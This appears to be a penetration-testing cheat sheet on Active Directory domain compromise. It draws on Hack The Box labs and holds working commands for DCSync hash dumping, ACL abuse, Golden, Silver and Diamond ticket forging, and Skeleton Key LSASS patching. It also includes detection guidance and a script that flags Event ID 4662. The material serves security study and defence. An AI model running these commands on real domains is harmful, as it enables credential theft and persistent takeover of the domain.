# DCSync and Golden Ticket

## Overview

DCSync is a technique that impersonates a Domain Controller to request password data replication from a legitimate DC via the MS-DRSR protocol (the DRSUAPI RPC interface). It requires the Replicating Directory Changes All (DS-Replication-Get-Changes-All) extended right, which is granted to Domain Admins, Enterprise Admins, and Domain Controllers by default. Golden, Silver, and Diamond tickets are Kerberos ticket forgery techniques that use compromised long-term keys (the krbtgt hash for Golden, a service account's hash for Silver) to create arbitrary Kerberos tickets without interacting with the KDC. These represent the ultimate domain compromise techniques.
## Prerequisites

DCSync:

- A user account with the `DS-Replication-Get-Changes-All` extended right (Domain Admins, or a misconfigured account via ACL abuse)
- Network access to the DC's DRSUAPI interface

Golden Ticket:

- The krbtgt account's NTLM hash (obtained through DCSync or NTDS.dit extraction)
- The domain SID (obtainable via `lookupsid`, `whoami /user`, or `Get-DomainSID`)
- Domain FQDN

Silver Ticket:

- A service account's NTLM hash
- The service's SPN
- Domain SID
## Detection & Enumeration

### Check DCSync Rights

BloodHound: the "Find Principals with DCSync Rights" query shows all users and groups that can perform DCSync (edges `GetChangesAll` / `GetChanges` on the domain object).

PowerView (Windows):

```powershell
# List every principal holding a replication extended right on the domain object.
# PowerShell continues a line after a trailing pipe or backtick, not a backslash.
Get-ObjectAcl -DistinguishedName "dc=<domain>,dc=<tld>" -ResolveGUIDs |
    Where-Object { ($_.ObjectType -eq 'DS-Replication-Get-Changes-All' -or `
                    $_.ObjectType -eq 'DS-Replication-Get-Changes') -and `
                   $_.ActiveDirectoryRights -like '*ExtendedRight*' } |
    Select-Object SecurityIdentifier
```

LDAP search:

```bash
# Pull the domain object's security descriptor (base scope: the domain head only) for DACL review
ldapsearch -x -H ldap://<DC> -D '<user>' -w '<pass>' \
    -b "dc=<domain>,dc=<tld>" -s base "(objectClass=*)" nTSecurityDescriptor
```
### Domain SID Discovery

```bash
# lookupsid via SMB (null session)
lookupsid.py guest@10.10.10.10 -no-pass | head -20
# Output: Domain SID is: S-1-5-21-XXXX-XXXX-XXXX

# From Linux with credentials
impacket-lookupsid <domain>/<user>:<pass>@<DC> | grep "Domain SID"
```

From Windows:

```powershell
# The domain SID is the user's SID minus the last (RID) segment
whoami /user

# PowerShell (ActiveDirectory module)
Get-ADDomain | Select-Object DomainSID
(Get-ADUser <username>).SID.AccountDomainSID
```
## Exploitation / Execution

### DCSync with secretsdump.py

```bash
# Dump all domain hashes (requires replication rights)
impacket-secretsdump <domain>/<user>@<DC>
# Output: one line per domain user in uid:rid:lmhash:nthash::: format

# Dump NTLM hashes only
impacket-secretsdump <domain>/<user>@<DC> -just-dc-ntlm

# Dump a specific user only
impacket-secretsdump <domain>/<user>@<DC> -just-dc-user Administrator
# Output: Administrator:500:aad3b435b51404eeaad3b435b51404ee:<nthash>:::

# Using an NTLM hash instead of a password (empty LM half before the colon)
impacket-secretsdump <domain>/<user>@<DC> -hashes :<nt_hash>

# Using Kerberos authentication (TGT in ccache)
export KRB5CCNAME=<ticket>.ccache
impacket-secretsdump -k -no-pass <domain>/<user>@<DC>

# DCSync with a ticket for the DC machine account (Rebound HTB)
KRB5CCNAME=./DC01\$@http_dc01.rebound.htb@REBOUND.HTB.ccache \
    secretsdump.py -k -no-pass dc01.rebound.htb -just-dc-user Administrator
```
### Granting DCSync Rights via ACL Abuse

From Forest HTB (Account Operators -> Exchange Windows Permissions -> WriteDACL on the domain object):

```powershell
# 1. Create a controlled user
net user john abc123! /add /domain
# 2. Add it to Exchange Windows Permissions (has WriteDACL on the domain object)
net group "Exchange Windows Permissions" john /add
# 3. Grant DCSync rights using PowerView
. .\PowerView.ps1
$pass = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\john', $pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
```

```bash
# 4. Run DCSync with the newly-granted account
impacket-secretsdump htb/john@10.10.10.161
```
### Golden Ticket

A Golden Ticket is a forged TGT encrypted with the krbtgt hash, granting access to any service as any user.

```bash
# impacket-ticketer: forge a Golden Ticket
impacket-ticketer -nthash <krbtgt_nt_hash> -domain-sid <domain_sid> \
    -domain <domain> -dc-ip <DC> Administrator
# Produces Administrator.ccache

# With custom user and groups (RID 500 = built-in Administrator, 512 = Domain Admins)
impacket-ticketer -nthash <krbtgt_nt_hash> -domain-sid <domain_sid> \
    -domain <domain> -dc-ip <DC> -user-id 500 -groups 512,513,518,519,520 FakeAdmin

# Export and use the ticket
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass <domain>/Administrator@<DC>
impacket-secretsdump -k -no-pass <domain>/Administrator@<DC> -just-dc-ntlm
```

mimikatz (Windows):

```
mimikatz # kerberos::golden /domain:<domain> /sid:<sid> /krbtgt:<hash> /user:Administrator /id:500 /ptt
```
### Silver Ticket

A Silver Ticket forges a service ticket (TGS) for a specific service, using that service account's NTLM hash. It never touches the KDC.

```bash
# impacket-ticketer: forge a Silver Ticket for a given SPN
# First obtain the service account's NT hash, then create the ticket
impacket-ticketer -nthash <svc_nt_hash> -domain-sid <domain_sid> \
    -domain <domain> -dc-ip <DC> -spn <SPN> Administrator

# Example from Escape HTB (MSSQL service; sql_svc NT hash 1443EC19DA4DAC4FFC953BCA1B57B4CF):
impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF \
    -domain-sid S-1-5-21-4078382237-1492182817-2568127209 \
    -domain sequel.htb -dc-ip dc.sequel.htb \
    -spn nonexistent/DC.SEQUEL.HTB Administrator
export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k dc.sequel.htb
```

mimikatz (Windows):

```
mimikatz # kerberos::golden /domain:<domain> /sid:<sid> /target:<target_server> /service:<service_type> /rc4:<svc_hash> /user:Administrator /ptt
```
### Silver Ticket for CIFS/HOST/LDAP

Most commonly used service types:

```bash
# CIFS (file access):
impacket-ticketer -spn "cifs/target.domain.local" -domain-sid S-1-5-21-... -domain domain.local -nthash NTLM_HASH -user-id 500 administrator
# HOST (service creation / scheduled tasks):
impacket-ticketer -spn "host/target.domain.local" -domain-sid S-1-5-21-... -domain domain.local -nthash NTLM_HASH -user-id 500 administrator
# LDAP (AD queries):
impacket-ticketer -spn "ldap/dc.domain.local" -domain-sid S-1-5-21-... -domain domain.local -nthash NTLM_HASH -user-id 500 administrator
# Use with:
KRB5CCNAME=administrator.ccache impacket-psexec domain.local/administrator@target -k -no-pass
```
### Diamond Ticket

A Diamond Ticket is a legitimately requested TGT whose PAC is then altered (and re-encrypted with the krbtgt key) to add privileged group memberships, rather than forging the entire ticket.

```bash
# 1. Request a legitimate TGT for a low-privileged user
getTGT.py -dc-ip <DC> <domain>/<low_priv_user>:<pass>
```

```
# 2. Use Rubeus (Windows) to modify the PAC
Rubeus.exe diamond /ticket:<base64_ticket> /ticketuser:Administrator /ticketuserid:500 /groups:512 /krbkey:<krbtgt_aes256_key> /nowrap
# This adds Domain Admins (RID 512) to the ticket's PAC
```

### Diamond Ticket / Forged PAC (Alternative)

Diamond Ticket: a TGT with a custom PAC (more flexible than a Golden Ticket).

```
# Using Rubeus (requests the TGT itself with /user and /password, then rewrites the PAC):
Rubeus.exe diamond /krbkey:KRBTGT_KEY /user:administrator /password:Password1 /domain:domain.local /enctype:aes256 /ticketuser:administrator /ticketuserid:500 /groups:512 /dc:dc.domain.local /createnetonly:C:\temp\program.exe
```

```bash
# Using impacket-ticketer (forges the TGT with the chosen PAC groups rather than modifying a real one):
impacket-ticketer -domain domain.local -domain-sid S-1-5-21-... -nthash KRBTGT_HASH -user-id 500 -groups 512,513 administrator
```
### Skeleton Key

The Skeleton Key is a destructive technique that patches LSASS on the Domain Controller to accept a master password for any account.

```
# mimikatz: DO NOT USE on production/live engagements
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Now any user can authenticate with password "mimikatz"
# Example: net use \\DC\C$ /user:Administrator mimikatz
# WARNING: This patches LSASS in memory on EVERY DC you run it on.
# Restart required to clear. Will break things. High forensic footprint.
```
## Detection and OPSEC Differences

| Technique | Kerberos KDC Interaction | Event ID | Detection Difficulty | Persistence |
|---|---|---|---|---|
| DCSync | No (uses DRSUAPI, not Kerberos) | 4662 (directory service access) | Medium — unusual replication requests | One-time credential dump |
| Golden Ticket | No KDC contact after creation | None after creation; 4768 for usage | Low — appears as legitimate TGT | Long-term (krbtgt hash lifetime) |
| Silver Ticket | No KDC contact | None after creation | Low — appears as legitimate TGS | Service-specific (hash lifetime) |
| Diamond Ticket | KDC contact for initial TGT | 4768 for TGT request, then modified | Medium — normal TGT with modified PAC | Short-term (TGT lifetime ~10h) |
| Skeleton Key | Normal authentication | Normal 4624/4768 | High — LSASS patching artifacts | Reboot clears; forensic trail |
## Common Pitfalls

- DCSync without replication rights: returns `rpc_s_access_denied`. Verify the account has the extended rights or grant them first.
- Golden Ticket with wrong krbtgt hash: ticket creation succeeds but authentication fails silently. Double-check the hash source.
- PAC validation: Modern DCs with March 2020+ updates validate PAC signatures. A Diamond ticket approach (modifying a legitimate TGT's PAC) may be needed.
- Clock skew: Kerberos tickets have strict time validity. Synchronize with `sudo ntpdate -u <DC>`.
- krbtgt hash rotation: Changing the krbtgt password twice invalidates all existing tickets. A Golden Ticket created with the old hash will stop working.
## OPSEC Considerations

- DCSync is detected: Modern EDR and SIEM solutions flag DCSync attempts. The DRSUAPI replication request generates Event ID 4662 on the DC.
- Event ID 4662 (Object Access) DCSync signature: Properties contain {Replicating Directory Changes} and/or {Replicating Directory Changes All}, Object Type: domainDNS. This is the PRIMARY detection signature for DCSync in enterprise SIEM. In raw form the Properties field carries the extended-right GUID, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes).
- Golden/Silver Tickets bypass MFA: Since tickets are forged offline, they never engage MFA mechanisms.
- Golden Ticket TGT lifetime: Default TGT lifetime is 10 hours. The ticket works until it expires.
- krbtgt NTLM hash: This is the ultimate domain key. Protect it — if the hash is compromised, every account in the domain is compromised.
- No password change events: Using tickets does not change user passwords, avoiding password-reset detection.
- Silver Ticket limitation: Only works for the specific service whose hash you possess.
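The 4662 signature described above, written out as detection logic. This is an added example, not part of the original notes: it extracts the replication extended-right GUIDs from a record's Properties field, keeps only hits on the domain object, and separates principals that are expected to replicate (the DC machine accounts and an AD Connect sync account, supplied as an allowlist) from everything else. The sample records are constructed; the two GUIDs beyond the one cited on the page are the well-known companion replication rights.

```python
import re
# Well-known AD extended-right GUIDs: the page cites the first; the other two are its companions
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample 4662 records, normalised to dicts the way a SIEM presents them
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "ObjectType": "domainDNS",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "user",
     "Properties": "%%7685 {bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

def replication_rights(properties):
    """Names of the replication extended rights listed in a 4662 Properties field."""
    names = []
    for guid in GUID_RE.findall(properties):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name and name not in names:
            names.append(name)
    return names

def is_dcsync_signature(event):
    """Primary signature: 4662 on the domain object (domainDNS) naming a replication right."""
    return (event.get("EventID") == 4662
            and str(event.get("ObjectType", "")).lower() == "domaindns"
            and bool(replication_rights(str(event.get("Properties", "")))))

def triage(events, expected_replicators):
    """Split signature hits into expected (known DCs, AD Connect account) and suspect.
    Compare against the real DC list: a trailing '$' only proves 'some computer account'."""
    expected, suspect = [], []
    for ev in events:
        if not is_dcsync_signature(ev):
            continue
        hit = (ev["SubjectUserName"], replication_rights(ev["Properties"]))
        (expected if ev["SubjectUserName"] in expected_replicators else suspect).append(hit)
    return expected, suspect

if __name__ == "__main__":
    _, alerts = triage(SAMPLE_EVENTS, {"DC01$", "DC02$", "MSOL_<placeholder>"})  # allowlist is assumed
    for who, rights in alerts:
        print(f"ALERT: {who} exercised {', '.join(rights)} on the domain object")
```

Feeding the three sample records through `triage` flags only `svc_loanmgr`, the Sauna-style account that holds replication rights without being a DC.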
## Post-Exploitation Value

- Complete domain credential compromise via DCSync
- Persistent access via Golden Ticket (valid as long as krbtgt hash does not change)
- Targeted service access via Silver Ticket
- The krbtgt hash and domain SID are sufficient to forge tickets for any user to any service
## Cross-References

### Tool References

| Tool | Link |
|---|---|
| secretsdump (Impacket) | https://github.com/fortra/impacket |
| ticketer (Impacket) | https://github.com/fortra/impacket |
| Rubeus | https://github.com/GhostPack/Rubeus |
| mimikatz | https://github.com/gentilkiwi/mimikatz |
| PowerView | https://github.com/PowerShellMafia/PowerSploit |
### Source Machines

- Sauna (Easy) — svc_loanmgr had DCSync rights -> secretsdump -just-dc-user Administrator -> pass-the-hash with psexec
- Forest (Easy) — Account Operators -> Exchange Windows Permissions -> Add-ObjectACL DCSync -> secretsdump -> Administrator hash
- Flight (Hard) — Machine account TGT via Rubeus tgtdeleg -> DCSync via secretsdump with -k -no-pass
- Rebound (Insane) — RBCD -> DC01$ impersonation -> DCSync -> Administrator hash
- Authority (Medium) — ESC1 certificate -> PassTheCert RBCD -> getST -> DCSync -> Administrator hash